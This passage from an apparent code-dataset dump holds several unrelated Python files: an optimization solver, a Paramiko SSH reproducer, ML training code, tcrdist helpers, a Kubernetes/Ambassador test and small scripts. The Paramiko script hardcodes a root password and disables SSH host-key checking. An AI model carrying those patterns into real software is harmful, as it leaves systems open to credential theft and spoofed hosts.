np.append(eq_constraints_mat,np.zeros((num_constraints, num_constraints)))\n kkt_mat = np.append(kkt_mat, [tmp_mat], axis=0)\n kkt_rhs = np.append(-grad, eq_constraints_rhs)\n sol = np.linalg.solve(kkt_mat, kkt_rhs)\n pk = sol[0:len(x0)] # primal solution\n w = sol[len(x0):] # dual solution\n # line search along direction pk (wolfe condition) on residual\n\n if len(w_prev) == 0:\n # first iteration, no change in w\n w_prev = w\n delta_nu = w - w_prev # change in lagrange multipliers\n t = 1\n residual = calc_residual(grad, eq_constraints_mat, eq_constraints_rhs, x, w)\n residual_t = calc_residual(grad, eq_constraints_mat, eq_constraints_rhs, x + t * pk, w + t * delta_nu)\n while (1 - alpha*t)*np.sqrt(np.dot(residual, residual)) < np.sqrt(np.dot(residual_t, residual_t)):\n t *= backtrack_factor\n residual_t = calc_residual(grad, eq_constraints_mat, eq_constraints_rhs, x + t * pk, w + t * delta_nu)\n\n # update x and w\n x += pk * t\n w += delta_nu * t\n # check convergence\n if np.dot(eq_constraints_mat, x) == eq_constraints_rhs and residual_t < res_tol:\n is_converged = 1\n\n # prepare for next iteration\n w_prev = w\n\n\ndef calc_residual(gradient, eq_constraints_mat, eq_constraints_rhs, x, v):\n # calculate residual\n r_dual = gradient + np.dot(np.transpose(eq_constraints_mat), v)\n r_primal = np.dot(eq_constraints_mat, x) - eq_constraints_rhs\n return np.append(r_dual, r_primal)\n","repo_name":"shira-shafir/constrained_opt","sub_path":"src/constrained_min.py","file_name":"constrained_min.py","file_ext":"py","file_size_in_byte":7768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27884555446","text":"# REPRODUCER for (suspected) Paramiko limitation:\n# The largest output Paramiko can handle when recv_exit_status() is \n# called first is 2097152 bytes, which is exactly 2 MiB. Any larger\n# than that and it hangs. \n# If I move recv_exit_status() to after the read(), Paramiko sails\n# past that limit without issue.\n# NOTE: with these version this issue is not observed\n# 3.6.8 (default, Oct 19 2021, 05:14:06) \n# [GCC 8.5.0 20210514 (Red Hat 8.5.0-3)]\n# 2.8.1 <-- paramiko version\n##############################################################\n\nimport sys\nimport paramiko\n\nprint(sys.version)\nprint(paramiko.__version__)\n\nclient = paramiko.client.SSHClient()\n##client.load_system_host_keys()\n##client.set_missing_host_key_policy(paramiko.client.AutoAddPolicy())\nclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\ntry:\n client.connect(hostname='127.0.0.1', username=\"root\", password=\"100yard-\",\n port=22, timeout=2)\nexcept Exception as _e:\n sys.stdout.write(str(_e))\n sys.exit(1)\n\noutput_len = 2097150\n\nwhile True:\n stdin, stdout, stderr = client.exec_command(\n 'printf %{}s'.format(output_len),\n get_pty=True)\n\n exit_status = stdout.channel.recv_exit_status()\n stdout_output = stdout.read().decode('utf8').rstrip('\\n')\n\n print(len(stdout_output))\n output_len += 1\n\n","repo_name":"jharriga/BootTime","sub_path":"Sandbox/rcv_exit_status.py","file_name":"rcv_exit_status.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"18668505154","text":"from __future__ import print_function\nimport sys\nimport argparse\nimport time\nimport random\nimport torch\nimport numpy as np\nimport sys\nsys.path.append(\"..\")\nfrom main_ce import set_loader\nfrom utils.util import AverageMeter, set_optimizer\nfrom utils.util import accuracy\nfrom networks.DRSN import DRSN_CW\n\n\n\n\n\ndef parse_option():\n parser = argparse.ArgumentParser('argument for training')\n\n parser.add_argument('--print_freq', type=int, default=1,\n help='print frequency')\n parser.add_argument('--batch_size', type=int, default=128,\n help='batch_size')\n parser.add_argument('--num_workers', type=int, default=0,\n help='num of workers to use')\n parser.add_argument('--epochs', type=int, default=200,\n help='number of training epochs')\n\n # optimization\n parser.add_argument('--learning_rate', type=float, default=0.1,\n help='learning rate')\n parser.add_argument('--weight_decay', type=float, default=1e-4,\n help='weight decay')\n parser.add_argument('--momentum', type=float, default=0.9,\n help='momentum')\n\n parser.add_argument('--data_folder',\n type=str,\n default=None,\n help='path to custom dataset')\n # model dataset\n parser.add_argument('--model', type=str, default='DRSN')\n parser.add_argument('--dataset', type=str, default='CWRU_signal',\n choices=['gear_fault_signal', 'CWRU_signal', 'XMU_Motor_signal'], help='dataset')\n\n\n opt = parser.parse_args()\n\n # set the path according to the environment\n if opt.data_folder is None:\n raise ValueError('No data folder Input!!')\n\n opt.model_name = '{}_{}_lr_{}_decay_{}_bsz_{}'.\\\n format(opt.dataset, opt.model, opt.learning_rate, opt.weight_decay,\n opt.batch_size)\n\n \n\n return opt\n\n\ndef set_model(opt):\n model = DRSN_CW()\n model = model.cuda()\n criterion = torch.nn.CrossEntropyLoss()\n return model, criterion\n\n\ndef train(train_loader, model, criterion, optimizer, epoch, opt):\n \"\"\"one epoch training\"\"\"\n model.train()\n\n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n\n end = time.time()\n for idx, (singals, labels) in enumerate(train_loader):\n data_time.update(time.time() - end)\n\n singals = singals.float().cuda(non_blocking=True)\n labels = labels.long().cuda(non_blocking=True) \n bsz = labels.shape[0]\n\n # compute loss\n output = model(singals)\n\n loss = criterion(output, labels)\n\n # update metric\n losses.update(loss.item(), bsz)\n acc1, acc5 = accuracy(output, labels, topk=(1, 5))\n top1.update(acc1[0], bsz)\n\n # SGD\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n # print info\n if (idx + 1) % opt.print_freq == 0:\n print('Train: [{0}][{1}/{2}]\\t'\n 'BT {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'DT {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'loss {loss.val:.3f} ({loss.avg:.3f})\\t'\n 'Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(\n epoch, idx + 1, len(train_loader), batch_time=batch_time,\n data_time=data_time, loss=losses, top1=top1))\n sys.stdout.flush()\n\n return losses.avg, top1.avg\n\n\ndef validate(val_loader, model, criterion, opt):\n \"\"\"validation\"\"\"\n model.eval()\n\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n\n with torch.no_grad():\n end = time.time()\n for idx, (signals, labels) in enumerate(val_loader):\n signals = signals.float().cuda()\n labels = labels.long().cuda()\n bsz = labels.shape[0]\n\n # forward\n output = model(signals)\n loss = criterion(output, labels)\n\n # update metric\n losses.update(loss.item(), bsz)\n acc1, acc5 = accuracy(output, labels, topk=(1, 5))\n top1.update(acc1[0], bsz)\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if idx % opt.print_freq == 0:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Acc@1 {top1.val:.3f} ({top1.avg:.3f})'.format(\n idx, len(val_loader), batch_time=batch_time,\n loss=losses, top1=top1))\n\n print(' * Acc@1 {top1.avg:.3f}'.format(top1=top1))\n return losses.avg, top1.avg\n\n\ndef main():\n random.seed(0)\n np.random.seed(0)\n torch.manual_seed(0)\n torch.cuda.manual_seed_all(0)\n \n best_acc = 0\n opt = parse_option()\n # build data loader\n train_loader, val_loader = set_loader(opt)\n\n # build model and criterion\n model, criterion = set_model(opt)\n\n # build optimizer\n # optimizer = torch.optim.Adam(model.parameters(),\n # lr=opt.learning_rate,\n # weight_decay=opt.weight_decay)\n optimizer = set_optimizer(opt, model)\n # lr_scheduler\n lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,\n milestones=[40, 80], gamma = 0.1)\n # training routine\n for epoch in range(1, opt.epochs + 1):\n\n # train for one epoch\n time1 = time.time()\n loss, acc = train(train_loader, model, criterion,\n optimizer, epoch, opt)\n time2 = time.time()\n print('Train epoch {}, total time {:.2f}, accuracy:{:.2f}'.format(\n epoch, time2 - time1, acc))\n lr_scheduler.step()\n loss, val_acc = validate(val_loader, model, criterion, opt)\n\n if val_acc > best_acc:\n best_acc = val_acc\n\n print('best accuracy: {:.2f}'.format(best_acc))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JoaquinChou/SigSiam","sub_path":"baselines/main_drsn.py","file_name":"main_drsn.py","file_ext":"py","file_size_in_byte":6276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71433141353","text":"\"\"\"\nSimple set of functions for summarizing over a group\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport re\n\n\ndef filter_is(df, col, val):\n return df[df[col] == val]\n\ndef filter_in(df, col, vals):\n ind = [np.any(x in vals) for x in df[col]]\n return df[ind]\n\ndef filter_gt(df, col, val):\n return df[df[col] > val]\n\ndef filter_lt(df, col, val):\n return df[df[col] < val]\n\n\ndef is_subset(set1, set2):\n \"\"\"\n Return True, if all members of set2 are contained in set1. \n i.e, set2 is a subset of set1. See example for clarity:\n Example\n -------\n >>> is_subset(set([\"A\",\"B\"]), set([\"A\"]))\n True\n >>> is_subset(set([\"A\",\"B\"]), set([\"A\",\"C\"]))\n False\n \"\"\"\n return set(set2)-set(set1) == set()\n\n\ndef is_almost_subset(set1, set2, min_set_diff = 2):\n \"\"\"\n Return True, if no more than min_set_diff members of set2 \n are contained in set1. \n i.e, set2 is almost a subset of set1. See example for clarity:\n \n Example\n -------\n >>> is_almost_subset(set([\"A\",\"B\",\"C\",\"D\"]), set([\"A\", \"K\"]), 2)\n True\n >>> is_almost_subset(set([\"A\",\"B\",\"C\",\"D\"]), set([\"A\", \"K\"]), 1)\n False\n\n \"\"\"\n return len(set(set2)-set(set1)) < min_set_diff\n\n\ndef test_for_subsets(list_of_sets):\n \"\"\"\n\n test_for_subsets (formerly known as turtles_all_the_way_down)\n\n For a ranked list of sets, return a vector where 1 \n indicated the set is not a subset of any of sets\n that come before it in the list. \n\n This is useful for eliminating clusters (sets) of TCRs\n which are smaller than a higher ranked and larger set \n that contains all its members. See example for clarity:\n\n Example \n -------\n >>> test_for_subsets([[\"A\",\"B\",\"C\"], [\"A\",\"C\",\"D\"], [\"A\",\"D\"], [\"B\",\"E\"],[\"B\",\"C\"]])\n [1, 1, 0, 1, 0] \n >>> test_for_subsets([ [1,2,3], [1,3,4], [1,4], [2,5],[2,3]])\n [1, 1, 0, 1, 0]\n \"\"\"\n tracker = [1]\n if isinstance(list_of_sets, pd.Series):\n list_of_sets = list_of_sets.to_list()\n checked_sets = [list_of_sets[0]]\n for s in list_of_sets[1:]:\n if np.any([is_subset(cs, s) for cs in checked_sets]):\n tracker.append(0)\n else: \n tracker.append(1)\n checked_sets.append(s)\n assert len(tracker) == len(list_of_sets)\n return tracker\n\n\ndef test_for_almost_subsets(list_of_sets, thr = 3):\n \"\"\"\n\n test_for_subsets (formerly known as turtles_all_the_way_down)\n\n For a ranked list of sets, return a vector where 1 \n indicated the set is not a subset of any of sets\n that come before it in the list. \n\n This is useful for eliminating clusters (sets) of TCRs\n which are smaller than a higher ranked and larger set \n that contains all its members. See example for clarity:\n\n Example \n -------\n >>> test_for_almost_subsets([[\"A\",\"B\",\"C\"], [\"A\",\"C\",\"D\"], [\"A\",\"D\"], [\"B\",\"E\"],[\"B\",\"C\"]], 1)\n [1, 1, 0, 1, 0] \n >>> test_for_almost_subsets([ [1,2,3], [1,3,4], [1,4], [2,5],[2,3]], 1)\n [1, 1, 0, 1, 0]\n \"\"\"\n tracker = [1]\n if isinstance(list_of_sets, pd.Series):\n list_of_sets = list_of_sets.to_list()\n checked_sets = [list_of_sets[0]]\n for s in list_of_sets[1:]:\n if np.any([is_almost_subset(cs, s, thr) for cs in checked_sets]):\n tracker.append(0)\n else: \n tracker.append(1)\n checked_sets.append(s)\n assert len(tracker) == len(list_of_sets)\n return tracker\n\n\n\ndef _dist_summ(data, precision = 1, scientific = True):\n \"\"\"\n Summarise distribution [as min,q1,median,q3, max]\n \n Parameters\n ----------\n data : list\n List of numeric data\n precision : int\n How many integers precision in scientific notation = 1, \n scientific : bool\n Default is True, to return result in scientific notation \n\n Examples\n --------\n >>> _dist_summ([1,2,3,4,5])\n ['1.e+00', '2.e+00', '3.e+00', '4.e+00', '5.e+00']\n \n _dist_summ([1,2,3,4,5], scientific=False)\n [1, 2.0, 3.0, 4.0, 5]\n\n \"\"\"\n dmin = np.min(data)\n dQ1 = np.percentile(data, q = 25, interpolation = 'midpoint') \n dmedian = np.median(data)\n dQ3 = np.percentile(data, q = 75, interpolation = 'midpoint') \n dmax = np.max(data)\n r = [dmin, dQ1, dmedian, dQ3, dmax]\n if scientific:\n return [np.format_float_scientific(s, precision = precision) for s in r]\n else:\n return r \n\n\n\ndef _select(df, iloc_rows, col = 'cdr3_b_aa'):\n return df.iloc[iloc_rows,][col].to_list()\n\ndef _summ(df, indices, column = None , f=None, fdf = None, **kwargs):\n \"\"\"\n _summ implements a split, apply some function, combine result routine. \n \n Parameters\n ----------\n f : callable\n a function callable on a list of series\n fdf : callable\n a function callable on a dataframe\n df : pd.DataFrame\n DataFrame\n indices : list\n list of lists containing integers corresponding to the iloc rows of a the < df >\n column : str or None\n column name, should be None if using a fdf\n \n Returns\n -------\n summary : list of identical lenght to indices\n\n Examples\n --------\n >>> from tcrdist.summarize import _summ, _occurs_N_str, _top_N_str\n >>> df = pd.DataFrame({'catvar':[\"a\",\"b\",\"b\",\"c\"], \"numvar\":[10,1,100,3]})\n >>> _summ(df, indices = [[0,1], [2,3]], column = 'numvar', f = np.median)\n [5.5, 51.5]\n >>> _summ(df, indices = [[0,1], [2,3]], column = 'catvar', f = _occurs_N_str, N = 2)\n ['b (50.0%), a (50.0%)', 'c (50.0%), b (50.0%)']\n >>> _summ(df, indices = [[0,1], [2,3]], column = 'catvar', fdf = _top_N_str, **{'col': 'catvar', 'count_col': 'numvar','N':2})\n ['a (90.9%), b (9.1%)', 'b (97.1%), c (2.9%)']\n \"\"\"\n summary = list()\n for ind in indices:\n if f is not None:\n if isinstance(df.iloc[ind, ][column], pd.Series):\n selection = df.iloc[ind, ][column].to_list()\n else:\n selection = df.iloc[ind, ][column]\n summary.append(f(selection, **kwargs))\n elif fdf is not None:\n selection = df.iloc[ind, ]\n summary.append(fdf(selection, **kwargs))\n else:\n raise(ValueError(\"No function (f) or function on a DataFrame (fdf) were supplied\\n\"))\n assert len(summary) == len(indices)\n return summary\n\ndef _occurs_N_str(m, N):\n \"\"\"\n Return occurances in a pd.Series as a string \n\n Example\n -------\n >>> _occurs_N_str([\"a\",\"b\",\"b\",\"c\"], 1)\n 'b (50.0%)' \n >>> _occurs_N_str([\"a\",\"b\",\"b\",\"c\"], 2)\n 'b (50.0%), c (25.0%)' \n >>> _occurs_N_str([\"a\",\"b\",\"b\",\"c\"], 3)\n 'b (50.0%), c (25.0%), a (25.0%)'\n \"\"\"\n if isinstance(m, pd.Series):\n gby = m.value_counts()\n else:\n m = pd.Series(m)\n gby = m.value_counts()\n gby = 100 * gby / gby.sum()\n gby = gby.sort_values(ascending=False)\n out = ', '.join(['%s (%2.1f%%)' % (idx, v) for idx,v in gby.iteritems()][:N])\n return out\n\n\ndef _top_N_str(m, col, count_col, N):\n \"\"\"\n Example\n -------\n >>> df = pd.DataFrame({'catvar':[\"a\",\"b\",\"b\",\"c\"], \"numvar\":[10,1,100,3]})\n >>> _top_N_str(df, col = 'catvar', count_col ='numvar', N=2)\n 'b (88.6%), a (8.8%)'\n \"\"\"\n gby = m.groupby(col)[count_col].agg(np.sum)\n gby = 100 * gby / gby.sum()\n gby = gby.sort_values(ascending=False)\n out = ', '.join(['%s (%2.1f%%)' % (idx, v) for idx,v in gby.iteritems()][:N])\n return out\n\n\ndef _extract_percentage(s, key):\n \"\"\"\n extractor for pattern '%s (%2.1f%%)', see examples for clarity\n\n Parameter\n ---------\n s : str\n string pattern '%s (%2.1f%%)','%s (%2.1f%%)','%s (%2.1f%%)'\n k : str\n key for the percentage you want to extract\n\n Returns \n -------\n tuple (str, float)\n \n Examples \n --------\n >>> _extract_percentage('naive_CD8 (100.0%)', 'naive_CD8')\n ('naive_CD8', '100.0')\n\n >>> _extract_percentage('naive_CD8 (100.0%)', 'PBMC')\n ('PMBC', 0.0)\n\n >>> _extract_percentage('naive_CD8 (94.1%), PBMC (5.9%)', 'PBMC')\n ('PBMC', '5.9')\n \"\"\"\n ls = s.split(\",\")\n try: \n rs = [re.search(pattern = '([A-Za-z0-9_]+) [(]([0-9]+[\\.][0-9])%[)]', string = s) for s in ls]\n rgs = [reg.groups() for reg in rs]\n return (key, {k:v for k,v in rgs}[key])\n except:\n return key, 0.0\n\n\n\ndef member_summ(res_df, clone_df, key_col = 'neighbors_i', count_col='count', addl_cols=[], addl_n=1):\n \"\"\"Return additional summary info about each result (row)) based on the members of the cluster.\n\n This is helpful for preparing strings to add to the tooltip in hierdiff.plot_hclust_props.\n \n Parameters\n ----------\n res_df : pd.DataFrame [nclusters x result cols]\n Returned from neighborhood_diff or hcluster_diff\n clone_df : pd.DataFrame [nclones x metadata]\n Contains metadata for each clone.\n key_col : str\n Column in res_df that specifies the iloc of members in the clone_df\n count_col : str\n Column in clone_df that specifies counts.\n Default none assumes count of 1 cell for each row.\n addl_cols : list\n Columns to summarize\n addl_n : int\n Number of top N clones to include in the summary of\n each cluster.\n\n Returns\n -------\n summ : pd.DataFrame [nclusters x summary columns]\n Columns that can be joined with res_df\n\n\n Example\n -------\n summ_df = member_summ(res_df, clone_df)\n res_df = res_df.join(summ_df, how='left')\"\"\"\n def _top_N_str(m, col, count_col, N):\n gby = m.groupby(col)[count_col].agg(np.sum)\n gby = 100 * gby / gby.sum()\n gby = gby.sort_values(ascending=False)\n out = ', '.join(['%s (%2.1f%%)' % (idx, v) for idx,v in gby.iteritems()][:N])\n return out\n \n split = []\n for resi, res_row in res_df.iterrows():\n m = clone_df.iloc[res_row[key_col]]\n\n mode_i = m[count_col].idxmax()\n summ = {}\n for c in [c for c in clone_df.columns if 'cdr3' in c]:\n summ[c] = _top_N_str(m, c, count_col, 1)\n for c in [c for c in clone_df.columns if 'gene' in c]:\n summ[c] = _top_N_str(m, c, count_col, 3)\n\n x_val_cols = [c for c in res_df.columns if 'x_val_' in c]\n x_freq_cols = [c for c in res_df.columns if 'x_freq_' in c]\n \n for label_col, freq_col in zip(x_val_cols, x_freq_cols):\n summ[res_row[label_col]] = np.round(res_row[freq_col], 3)\n\n for c in [c for c in addl_cols]:\n summ[c] = _top_N_str(m, c, count_col, addl_n)\n summ = pd.Series(summ, name=resi)\n split.append(summ)\n summ = pd.DataFrame(split)\n return summ","repo_name":"kmayerb/tcrdist3","sub_path":"tcrdist/summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":10625,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"72"} +{"seq_id":"40954576721","text":"import os\nimport subprocess\nimport tempfile\nimport time\nimport yaml\nfrom urllib import request\n\nclass WattTesting:\n def __init__(self):\n self.qotm_manifests = \"\"\"\n---\napiVersion: v1\nkind: Service\nmetadata:\n name: qotm\nspec:\n selector:\n service: qotm\n ports:\n - port: 80\n targetPort: http-api\n---\napiVersion: apps/v1\nkind: Deployment\nmetadata:\n name: qotm\nspec:\n selector:\n matchLabels:\n service: qotm\n replicas: 1\n strategy:\n type: RollingUpdate\n template:\n metadata:\n annotations:\n sidecar.istio.io/inject: \"false\"\n labels:\n service: qotm\n spec:\n serviceAccountName: ambassador\n containers:\n - name: qotm\n image: datawire/qotm:1.3\n imagePullPolicy: Always\n ports:\n - name: http-api\n containerPort: 5000\n\"\"\"\n\n def create_namespace(self, namespace):\n namespace_manifest = f\"\"\"\n---\napiVersion: v1\nkind: Namespace\nmetadata:\n name: {namespace}\n\"\"\"\n\n self.apply_kube_artifacts(namespace=namespace, artifacts=namespace_manifest)\n\n def manifests(self):\n pass\n\n def apply_manifests(self):\n pass\n\n @staticmethod\n def run_and_assert(command, communicate=True):\n print(f\"Running command {command}\")\n output = subprocess.Popen(command, stdout=subprocess.PIPE)\n if communicate:\n stdout, stderr = output.communicate()\n print('STDOUT', stdout.decode(\"utf-8\") if stdout is not None else None)\n print('STDERR', stderr.decode(\"utf-8\") if stderr is not None else None)\n assert output.returncode == 0\n return stdout.decode(\"utf-8\") if stdout is not None else None\n return None\n\n def install_ambassador(self, namespace):\n if namespace is None:\n namespace = 'default'\n\n self.create_namespace(namespace)\n\n final_yaml = []\n ambassador_yaml_path = \"/buildroot/ambassador/docs/yaml/ambassador/ambassador-rbac.yaml\"\n with open(ambassador_yaml_path, 'r') as f:\n ambassador_yaml = list(yaml.safe_load_all(f))\n\n for manifest in ambassador_yaml:\n if manifest.get('kind', '') == 'Deployment' and manifest.get('metadata', {}).get('name', '') == 'ambassador':\n # we want only one replica of Ambassador to run\n manifest['spec']['replicas'] = 1\n\n # let's fix the image\n manifest['spec']['template']['spec']['containers'][0]['image'] = os.environ['AMBASSADOR_DOCKER_IMAGE']\n\n # we don't want to do everything in /ambassador/\n manifest['spec']['template']['spec']['containers'][0]['env'].append({\n 'name': 'AMBASSADOR_CONFIG_BASE_DIR',\n 'value': '/tmp/ambassador'\n })\n\n final_yaml.append(manifest)\n\n self.apply_kube_artifacts(namespace=namespace, artifacts=yaml.safe_dump_all(final_yaml))\n\n namespace_crb = f\"\"\"\n---\napiVersion: rbac.authorization.k8s.io/v1beta1\nkind: ClusterRoleBinding\nmetadata:\n name: ambassador\nroleRef:\n apiGroup: rbac.authorization.k8s.io\n kind: ClusterRole\n name: ambassador\nsubjects:\n- kind: ServiceAccount\n name: ambassador\n namespace: {namespace}\n\"\"\"\n\n self.apply_kube_artifacts(namespace=namespace, artifacts=namespace_crb)\n\n ambassador_service_path = \"/buildroot/ambassador/docs/yaml/ambassador/ambassador-service.yaml\"\n install_ambassador_service_cmd = ['kubectl', 'apply', '-n', namespace, '-f', ambassador_service_path]\n self.run_and_assert(install_ambassador_service_cmd)\n\n def meta_action_kube_artifacts(self, namespace, artifacts, action):\n temp_file = tempfile.NamedTemporaryFile()\n temp_file.write(artifacts.encode())\n temp_file.flush()\n self.run_and_assert(['kubectl', action, '-n', namespace, '-f', temp_file.name])\n temp_file.close()\n\n def apply_kube_artifacts(self, namespace, artifacts):\n self.meta_action_kube_artifacts(namespace=namespace, artifacts=artifacts, action='apply')\n\n def delete_kube_artifacts(self, namespace, artifacts):\n self.meta_action_kube_artifacts(namespace=namespace, artifacts=artifacts, action='delete')\n\n def apply_qotm_endpoint_manifests(self, namespace):\n qotm_resolver = f\"\"\"\napiVersion: getambassador.io/v1\nkind: KubernetesEndpointResolver\nmetadata:\n name: qotm-resolver\n namespace: {namespace}\n\"\"\"\n\n self.apply_kube_artifacts(namespace=namespace, artifacts=qotm_resolver)\n self.create_qotm_mapping(namespace=namespace)\n\n def create_qotm_mapping(self, namespace):\n qotm_mapping = f\"\"\"\n---\napiVersion: getambassador.io/v1\nkind: Mapping\nmetadata:\n name: qotm-mapping\n namespace: {namespace}\nspec:\n prefix: /qotm/\n service: qotm.{namespace}\n resolver: qotm-resolver\n load_balancer:\n policy: round_robin\n \"\"\"\n\n self.apply_kube_artifacts(namespace=namespace, artifacts=qotm_mapping)\n\n def delete_qotm_mapping(self, namespace):\n qotm_mapping = f\"\"\"\n---\napiVersion: getambassador.io/v1\nkind: Mapping\nmetadata:\n name: qotm-mapping\n namespace: {namespace}\nspec:\n prefix: /qotm/\n service: qotm.{namespace}\n resolver: qotm-resolver\n load_balancer:\n policy: round_robin\n \"\"\"\n\n self.delete_kube_artifacts(namespace=namespace, artifacts=qotm_mapping)\n\n def test_rapid_additions_and_deletions(self):\n namespace = 'watt-rapid'\n\n # Install Ambassador\n self.install_ambassador(namespace=namespace)\n\n # Install QOTM\n self.apply_kube_artifacts(namespace=namespace, artifacts=self.qotm_manifests)\n\n # Install QOTM Ambassador manifests\n self.apply_qotm_endpoint_manifests(namespace=namespace)\n\n # Now let's wait for ambassador and QOTM pods to become ready\n self.run_and_assert(['kubectl', 'wait', '--timeout=90s', '--for=condition=Ready', 'pod', '-l', 'service=ambassador', '-n', namespace])\n self.run_and_assert(['kubectl', 'wait', '--timeout=90s', '--for=condition=Ready', 'pod', '-l', 'service=qotm', '-n', namespace])\n\n # Let's port-forward ambassador service to talk to QOTM\n port_forward_port = 6000\n port_forward_command = ['kubectl', 'port-forward', '--namespace', namespace, 'service/ambassador', f'{port_forward_port}:80']\n self.run_and_assert(port_forward_command, communicate=False)\n qotm_url = f'http://localhost:{port_forward_port}/qotm/'\n\n # Assert 200 OK at /qotm/ endpoint\n qotm_ready = False\n\n loop_limit = 60\n while not qotm_ready:\n assert loop_limit > 0, \"QOTM is not ready yet, aborting...\"\n try:\n connection = request.urlopen(qotm_url, timeout=5)\n qotm_http_code = connection.getcode()\n assert qotm_http_code == 200, f\"Expected 200 OK, got {qotm_http_code}\"\n connection.close()\n print(f\"{qotm_url} is ready\")\n qotm_ready = True\n\n except Exception as e:\n print(f\"Error: {e}\")\n print(f\"{qotm_url} not ready yet, trying again...\")\n time.sleep(1)\n loop_limit -= 1\n\n # Try to mess up Ambassador by applying and deleting QOTM mapping over and over\n for i in range(10):\n self.delete_qotm_mapping(namespace=namespace)\n self.create_qotm_mapping(namespace=namespace)\n\n # Let's give Ambassador some time to register the changes\n time.sleep(60)\n\n # Assert 200 OK at /qotm/ endpoint\n connection = request.urlopen(qotm_url, timeout=5)\n qotm_http_code = connection.getcode()\n assert qotm_http_code == 200, f\"Expected 200 OK, got {qotm_http_code}\"\n connection.close()\n\ndef test_watt():\n watt_test = WattTesting()\n watt_test.test_rapid_additions_and_deletions()\n\n\nif __name__ == '__main__':\n test_watt()\n","repo_name":"holahula/ambassador","sub_path":"python/tests/test_watt_scaling.py","file_name":"test_watt_scaling.py","file_ext":"py","file_size_in_byte":7962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"228103054","text":"from django import forms\nfrom django.conf import settings\n\nfrom .models import Tweet\n\n\nclass TweetForm(forms.ModelForm):\n class Meta:\n model = Tweet\n fields = [\n 'content'\n ]\n\n def clean_content(self):\n content = self.cleaned_data.get(\"content\")\n if len(content) > settings.MAX_TWEET_LENGTH:\n raise forms.ValidationError(\"The tweet is too long\")\n else:\n return content\n","repo_name":"ofisser86/tweetme2","sub_path":"tweets/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"12876351242","text":"from DataHandler import DataHandler\nimport itertools\n\ndata_handler = DataHandler()\n\ntry:\n print(data_handler)\n print(\"\")\n df_names = data_handler.files\n df_combinations = itertools.combinations(df_names,2)\n for combination in df_combinations:\n common_columns = data_handler.list_all_columns(selected_columns=combination)\n column1 = common_columns.values()[0]\n column2 = common_columns.values()[1]\n intersection = set(column1).intersection(column2)\n if not intersection:\n continue\n print(\"Columns %s,%s Have %s in common\" % (common_columns.keys()[0], common_columns.keys()[1], intersection))\n print(\"\")\nexcept Exception as e:\n print(e)","repo_name":"MoldaB/IIoTProject2-DataAnalytics","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10059248749","text":"import csv\nimport os\nimport itemfinder\n\n\ndef getEquipmentList():\n out = []\n \n with open(\"_append/data/text/equipment.csv\",\"r\") as f:\n reader = csv.reader(f)\n for row in reader:\n if \"_\" not in row[0] and \"?\" not in row[0] and row[0] != \"Name\":\n out.append(row[0])\n return(out)\n\ndef mainscript():\n \"\"\"\n writes out a list of equipment, and the episodes it appears in\n \n \"\"\"\n gens = [\"robot_youchooseyoulose\",\"jester_finderskeepers\",\"thief_finderskeepers\",\"jester_warrior\",\"inventor_rust\",\"thief_uptick\"]\n pref = [\"warrior\",\"thief\",\"robot\",\"inventor\",\"witch\",\"jester\"]\n for p in pref:\n gens.append(p+\"_normal\")\n eqs = {}\n for g in gens:\n eqs[g] = itemfinder.mainscript(g)\n for p in pref:\n pu = p + \"_paralleluniverse\"\n br = p + \"_remixgenerator\"\n eqs[pu] = itemfinder.mainscript(pu)\n eqs[br] = itemfinder.mainscript(br)\n outfile = open(\"file/equipment_list.txt\",\"w+\")\n notfound = open(\"file/not_found.txt\",\"w+\")\n for eq in getEquipmentList():\n flag = True\n outfile.write(eq+\"\\n\")\n for e in eqs:\n if eq in eqs[e]:\n outfile.write(\"* \"+e+\"\\n\")\n flag = False\n if flag: #hasn't been found, flag it!\n print(f\"Item {eq} not found in generators\")\n notfound.write(eq+\"\\n\")\n outfile.write(\"------\\n\")\n print(\"Press enter to exit\")\n input()\n \nif __name__ == \"__main__\":\n mainscript()\n","repo_name":"JuniorUdale/MoreFluff","sub_path":"epfinder.py","file_name":"epfinder.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"4027163251","text":"dict1 = {'w':4, 'p':3, 'b':2, 's':1}\ndict2 = {'m':4, 'q':3, 'd':2, 'z':1}\n\ndef alphabet_war(fight):\n count, count1 = 0,0\n for i in fight:\n\n if i in [x for x in dict1.keys()]:\n count = count + dict1[i]\n if i in [x for x in dict2.keys()]:\n count1 = count1 + dict2[i]\n print (count, count1)\n\n if count > count1:\n print(\"\")\n elif count < count1:\n print(\"\")\n else:\n print()\n\n\n\"\"\"def alphabet_war(fight):\n d = {'w':4,'p':3,'b':2,'s':1,\n 'm':-4,'q':-3,'d':-2,'z':-1}\n r 